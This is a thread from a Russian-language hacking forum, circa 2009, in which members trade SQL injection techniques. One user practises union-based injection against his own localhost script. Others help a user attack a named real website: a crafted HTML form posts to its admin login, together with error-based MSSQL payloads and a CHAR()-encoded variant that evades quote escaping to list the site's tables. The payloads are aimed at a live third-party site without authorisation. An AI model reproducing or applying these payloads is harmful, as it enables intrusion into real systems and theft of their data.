Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Если нужно выдернуть всех юзеров, а их очень много - использую прогу, для автоматизации процесса.
    К примеру - тот же Сипт.
     
    2 people like this.
  2. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Всем, спасибо! получилось!
     
  3. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    sql-inj

    здравствуйте

    http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+table_name='user'+l imit+1,2

    Не выводит ничего!
    Хотя запрос вида

    http://localhost/school/view_cat.php?cat=-1+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables
    работатет и выводиться список всех таблиц,в чем моя ошибка?

    мне посоветовали перевести в hex
    Тогда такой вопрос?
    Зачем ?Если скрипт написал я сам для практики и никакой фильтрации там нет!
     
  4. BloodyMessage

    BloodyMessage Elder - Старейшина

    Joined:
    20 Aug 2006
    Messages:
    190
    Likes Received:
    41
    Reputations:
    11
    kevmen, попробуй table_name='user' заменить на TABLE_NAME=CHAR(117,115,101,114)

    да и запросы по разному пути
    /school/view_cat.php и /view_cat.php
     
    #4884 BloodyMessage, 23 Jan 2009
    Last edited: 23 Jan 2009
  5. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Попробуй 'user' заменить на ('user')
     
  6. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    BloodyMessage,спасибо огромное)обясни только в чем проблема была?в кодировке? =)
     
  7. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    не работает :)
     
  8. BloodyMessage

    BloodyMessage Elder - Старейшина

    Joined:
    20 Aug 2006
    Messages:
    190
    Likes Received:
    41
    Reputations:
    11
    kevmen, видать ковычки фильтрует
     
  9. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    BloodyMessage,база?
    А разве база сама может фильтровать?
    Извини,если вопрос глупый
     
  10. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Не могу нащупать скулю
    Code:
    http://www.hc.kz/index.php?action=showpart&part_id=-1'
    Может кто поможет?
     
  11. BloodyMessage

    BloodyMessage Elder - Старейшина

    Joined:
    20 Aug 2006
    Messages:
    190
    Likes Received:
    41
    Reputations:
    11
    kevmen, а причем база? Скрипты то фильтруют.
     
    1 person likes this.
  12. vampir3a

    vampir3a New Member

    Joined:
    25 Nov 2007
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Всем привет ) подскажите пожалуста , как вызвать ошибку в Phpbb 3 и выше , что бы узнать пусть сайта...
    просбовал с 2х версий не выходит :(
     
  13. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 BloodyMessage and kevmen
    Уточняю, в большинстве подобных случаев никто никого не фильтрует...
    Просто на сервере стоит magic_quotes=on, т.е. экранирование кавычек, засчет чего запрос к базе содержащий кавычки портится лишними слешами и поэтому результат запроса возвращает ошибку...
    Доходчиво объяснил?
     
    4 people like this.
  14. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Gemini12, сделай такой скриптик:

    Code:
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
    <title>FUCK</title>
    <link href="/styles.css" rel="stylesheet" type="text/css">
    </head>
    <body bgcolor="#008080">
    <form action="http://www.hc.kz/admin/index.php" method="post">
    Login: <input type="text" name="Username"><br />
    Password: <input type="Password" name="Password"><br />
    <input type="submit" value="Fuck admin">
    </form>
    </html>
    и вбивай в поле "Логин":

    ' OR 1=@@VERSION--
    ' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables)--

    Дальше разберёшься?
     
  15. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    А можно поподробней? Где можно взять эту таблицу значений цифр?
     
  16. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    Iceangel_,спасибо!Я до этого понять не мог,почему при вводе новостей содержащих кавычки происходило экранирование,благодарю за объяснение!=)

    Gemini12,какая таблица значений еще?? :)
    кодировщик-декодировщик
    http://paulschou.com/tools/xlate/
    ищи тут
     
    #4896 kevmen, 23 Jan 2009
    Last edited: 23 Jan 2009
    1 person likes this.
  17. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Gemini12
    закодировать в чар можно здесь
    http://www.webfuture.ru/igo/convert.php
     
    1 person likes this.
  18. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Чето не совсем понял куда этот скрипт девать :(
    Не мог бы кинуть ссылочку на статейку про этот способ, или объясни ) заранее благодарен...
     
  19. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    я же написал скрип самописный и никакой фильтрации нет :)
     
  20. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Gemini12, чтобы обойти фильтр кавычек, в поле Логин вставляй преобразованные символьные строки:

    ' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name!=char(115)+char(104)+char(95)+char(99)+char(117)+char(115)+char(116)+char(111)+char(109)+char(101)+char(114)+char(115))--
     
Thread Status:
Not open for further replies.